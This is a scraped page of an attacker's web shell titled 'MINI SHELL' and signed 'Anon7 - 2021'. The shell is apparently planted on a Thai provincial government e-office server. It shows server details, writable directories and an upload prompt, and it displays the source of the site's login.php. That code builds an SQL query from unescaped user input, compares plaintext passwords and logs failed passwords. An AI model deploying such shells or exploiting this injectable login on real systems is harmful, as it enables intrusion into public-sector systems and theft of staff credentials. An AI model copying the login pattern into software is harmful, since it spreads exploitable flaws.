MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/bin/gov_news2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/bin/gov_news2/login.php
<?
session_start();
$nochecklogin= true;
include("../../config/config.inc.php");


function Query1($sql){
	$result  = mysql_query($sql);
	echo mysql_error();
	$rs = mysql_fetch_array($result);
	return $rs[0];
}


//include "../../../master/application/epm/epm.inc.php";
if($session_username){
			header("Location: menu_select.php");
			exit;
}
if ($_SERVER[REQUEST_METHOD] == "POST"){


$sql_logon="
select * from $table_staff where username='$uname';
";
	$result = mysql_query("$sql_logon");
	//echo "select * from $logintable where username='$uname';"; die;
	
	
	$rs = mysql_fetch_assoc($result);  //print_r($rs);
	if ($rs && $pwd  == $rs[password]){
		session_register("session_username");
		session_register("session_staffid");
		session_register("session_dev_id");
		session_register("session_depusername");
		session_register("session_fullname");
		session_register("session_mode");
		session_register("session_title");
		session_register("session_gid");

	session_register("session_staffname");
	session_register("session_staffsurname");
	session_register("session_username");
	session_register("session_office");
	session_register("session_pws");
	session_register("session_status_pri");
/* sesion จากระบบร้องเรียน
	session_register("session_staffname");
	session_register("session_staffsurname");
	session_register("session_username");
	session_register("session_office");
	session_register("session_pws");
	session_register("session_status_pri");
*/
// สำหรับ search
	session_register("session_keyword");
	session_register("session_topic");
	session_register("session_pdate_a");
	session_register("session_pdate_b");
	session_register("session_rdate_a");
	session_register("session_rdate_b");
	session_register("session_sdate_a");
	session_register("session_sdate_b");
	session_register("session_kdate_a");
	session_register("session_kdate_b");
	session_register("session_tdate_a");
	session_register("session_tdate_b");
	session_register("session_tdate_a");
	session_register("session_staff_search");
	session_register("session_group_search");



$sql_gcheck="
SELECT
$table_groupmember.gid,
$table_groupmember.staffid,
profile_permission.pid
FROM
$table_groupmember
Inner Join $table_staffgroup ON $table_groupmember.gid = $table_staffgroup.gid
Inner Join profile_permission ON profile_permission.gid = $table_staffgroup.gid
WHERE
$table_groupmember.staffid=$rs[staffid]
";

	//echo " &nbsp; &nbsp; &nbsp; <img src='dtree/img/users.gif' > (ทั่วไป) <BR>";
	$sql = "select t2.* from $table_groupmember  t1 inner join $table_staffgroup  t2 on t1.gid=t2.gid where t1.staffid='$rs[staffid]';"; 
	$xresult = mysql_query($sql);
	while ($xrs=mysql_fetch_assoc($xresult)){
	$session_gid[$rs[staffid]][$xrs[gid]]=$xrs[gid];
//	$session_gid=$xrs[gid];
	}
	//print_r($session_gid);
$result = mysql_query("$sql_gcheck");
while($rsg = mysql_fetch_assoc($result)){
if ($rsg[pid]) { $_SESSION[session_permit][$rsg[pid]]= on; }
}
//print_r($_SESSION[session_permit]);
		$_SESSION[session_username] = $uname;
		$_SESSION[session_staffid] = $rs[staffid];
		$_SESSION[session_dev_id] = $rs[org_id];
		$_SESSION[session_title] = $rs[title];
		$_SESSION[session_fullname] = $rs[prename] . " " . $rs[staffname] . " " . $rs[staffsurname];
		$_SESSION[session_fullname_title] = $rs[prename] . " " . $rs[staffname] . " " . $rs[staffsurname]." (".$rs[title].")";
		// สำหรับระบบ ร้องเรียน
		$session_staffname=$rs[staffname];
		$session_staffsurname=$rs[staffsurname];
		$session_office=$rs[staffname];
		$session_pws="$pwd";
		$session_status_pri="0";

//		addLog("",9,"Login เป็น $uname");
		addlog("login");


			header("Location: docreg.php");
			exit;
	}

	//8=login fail, 9 = login , 10 = logout
//	addLog("",8,"พยายาม login เป็น $uname ด้วยรหัสผ่าน $pwd");
	$msg = "Username หรือ Password ไม่ถูกต้อง";
	addlog("พยายาม login เป็น user :$uname: by :$pwd:");
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>ระบบทะเบียนหนังสือ</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<LINK href="../../common/style.css" rel=stylesheet>
<style type="text/css">
<!--
.header1 {	font-family:"MS Sans Serif", Tahoma, Arial;
	font-size:1em;
	font-weight:bold;
	color: #FFFFFF;
}
.main {	font-family:"MS Sans Serif", Tahoma, Arial;
	font-size:0.8em;
	color:#FF0000;
	font-weight:bold;
}
.normal {	font-family:"MS Sans Serif", Tahoma, Arial;
	font-size:0.8em;
}
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
</head>
<body  style="filter:progid:DXImageTransform.Microsoft.Gradient(GradientType=0, StartColorStr='#273F6F', EndColorStr='#ffffff');">
<table width="100%" height="600" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td align="center"><table width="690" height="405" border="0" cellpadding="5" cellspacing="0" background="../../images/bar/lampang.jpg" bgcolor="#FFFFFF">
      
      <tr>
        <td style="border:#818181 solid 1px; "><table width="100%" border="0" cellspacing="0" cellpadding="0">
          
          
          <tr>
            <td align="center" style=" padding:10px;"><table width="350" border="0" cellpadding="0" cellspacing="0" bgcolor="#ECECEC">
              <tr>
                <td width="79" valign="top" background="../..//images/emp_main_new_27.gif" style=" background-repeat:repeat-y; background-position:left;"><img src="../../images/emp_main_new_19.gif" width="79" height="88"></td>
                <td width="264" background="../..//images/emp_main_new_20.gif" style="background-repeat:repeat-x; background-position:top"><FORM METHOD=POST ACTION="">
                  <br>
                  <table border=0 align=center>
                    <tr>
                      <td align="right" style="color:#FFFFFF">&nbsp;</td>
                      <td align="left">&nbsp;</td>
                      <td align="left">&nbsp;</td>
                    </tr>
                    <tr>
                      <td align="right" style="color:#666666"><B>Username</B></td>
                      <td align="left">&nbsp;</td>
                      <td align="left"><INPUT NAME="uname" TYPE="text" class="epm_inputbox" value="" size=20 maxlength=20></td>
                    </tr>
                    <tr>
                      <td align="right" style="color:#666666"><B>Password</B></td>
                      <td align="left">&nbsp;</td>
                      <td align="left"><INPUT NAME="pwd" TYPE="password" class="epm_inputbox" value="" size=20 maxlength=20></td>
                    </tr>
                    <tr>
                      <td>&nbsp;</td>
                      <td align="left">&nbsp;</td>
                      <td align="left"><input name="submit" type=submit class="epm_button" value="   Login   "></td>
                    </tr>
                    
                    <tr>
                      <td colspan="3" align="center"><div align="center"><font color="RED"><b>
                          <?=$msg?>
                      </b></font></div></td>
                    </tr>
                  </TABLE>
                </FORM></td>
                <td width="7" align="right" valign="top" background="../..//images/emp_main_new_25.gif" style="background-repeat: repeat-y; background-position:right"><img src="../..//images/emp_main_new_22.gif" width="7" height="15"></td>
              </tr>
              <tr>
                <td valign="bottom" background="../..//images/emp_main_new_27.gif" style=" background-repeat:repeat-y; background-position:left;"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                  <tr>
                    <td valign="bottom" background="../..//images/emp_main_new_31.gif"><img src="../..//images/emp_main_new_30.gif" width="7" height="6"></td>
                  </tr>
                </table></td>
                <td background="../..//images/emp_main_new_31.gif" style="background-repeat:repeat-x; background-position:bottom">&nbsp;</td>
                <td align="right" valign="bottom" background="../..//images/emp_main_new_25.gif" style="background-repeat: repeat-y; background-position:right"><img src="../..//images/emp_main_new_33.gif" width="7" height="6"></td>
              </tr>
              
            </table></td>
          </tr>
        </table></td>
      </tr>
      
    </table></td>
  </tr>
</table>

</body>
</html>

Anon7 - 2021